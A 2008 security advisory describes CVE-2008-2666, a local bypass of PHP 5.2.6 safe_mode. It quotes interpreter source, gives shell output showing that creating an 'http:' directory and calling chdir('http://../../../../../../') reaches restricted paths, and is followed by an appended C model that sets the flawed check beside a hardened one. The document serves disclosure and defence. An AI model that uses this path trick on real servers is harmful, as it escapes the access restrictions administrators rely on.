
PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass

SecurityAlert : 3942
CVE : CVE-2008-2666
CWE : CWE-264
SecurityRisk : Medium
Remote Exploit : No
Local Exploit : Yes
Victim interaction required : No
Exploit Given : Yes
ExploitAlert : 4226
Credit : Maksymilian Arciemowicz
Published : 17.06.2008
Updated : 30.06.2008
Affected Software : PHP 5.2.6 and prior

[ PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

chdir - Change directory

SYNOPSIS:
bool chdir ( string $directory )

http://pl.php.net/manual/en/function.chdir.php

ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:
int ftok ( string $pathname , string $proj )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON
WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---

Let's look at the chdir() function:

---
PHP_FUNCTION(chdir)
{
    char *str;
    int ret, str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
        RETURN_FALSE;
    }

    if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
        RETURN_FALSE;
    }
    ret = VCWD_CHDIR(str);

    if (ret != 0) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
---

str is being checked by safe_mode.

Example:

---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

In the current directory, we create a subdirectory named "http:". It is then
possible to call chdir("http://../../../../../../") and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)))

for

str="http://../../../../../../"

safe_mode will ignore all paths with http://

The same situation applies to the ftok() function (and more).

---EXAMPLE1---
cxib# cat /www/wufff.php
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON
WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to fix ---

Do not use safe_mode as your main safety measure.

--- 3. Greets ---

sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
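
A simplified model of the check described in section 1, added here as an illustration and not taken from the advisory or from PHP's source: a path check that exempts any string that looks like a URL, beside one that resolves the string as a local path before applying policy. ALLOWED_ROOT, resolve(), naive_allowed() and hardened_allowed() are hypothetical names, and a directory allow-list stands in for safe_mode's owner-uid comparison.

```c
#include <stdio.h>
#include <string.h>
#define ALLOWED_ROOT "/www"  /* constructed policy: only this tree is permitted */

/* Resolve path against cwd lexically (".", "..", repeated "/"); 0 = does not fit.
 * Production code should use realpath(), which also follows symlinks. */
static int resolve(const char *cwd, const char *path, char *out, size_t n)
{
    char buf[1024], *seg, *slash;
    int len = (path[0] == '/') ? snprintf(buf, sizeof buf, "%s", path)
                               : snprintf(buf, sizeof buf, "%s/%s", cwd, path);
    if (len < 0 || (size_t)len >= sizeof buf || n < 2) return 0;
    out[0] = '\0';
    for (seg = strtok(buf, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {            /* step up one component */
            if ((slash = strrchr(out, '/'))) *slash = '\0';
            continue;
        }
        if (strlen(out) + strlen(seg) + 2 > n) return 0;
        strcat(out, "/");
        strcat(out, seg);
    }
    if (out[0] == '\0') strcpy(out, "/");
    return 1;
}

/* Hardened model: policy is applied to the path the OS will actually walk. */
int hardened_allowed(const char *cwd, const char *path)
{
    char real[1024];
    size_t len = strlen(ALLOWED_ROOT);
    if (!resolve(cwd, path, real, sizeof real)) return 0;   /* fail closed */
    return !strncmp(real, ALLOWED_ROOT, len) && (real[len] == '/' || real[len] == '\0');
}

/* Flawed model: anything that looks like a URL skips the local-path check. */
int naive_allowed(const char *cwd, const char *path)
{
    if (strstr(path, "://")) return 1;     /* assumed remote, never resolved */
    return hardened_allowed(cwd, path);
}

int main(void)
{
    const char *p = "http://../../../../../../";   /* string from the advisory */
    printf("naive=%d hardened=%d\n", naive_allowed("/www", p), hardened_allowed("/www", p));
    return 0;
}
```

The hardened variant treats "http:" as an ordinary directory name, so the decision is made on "/" rather than on the prefix.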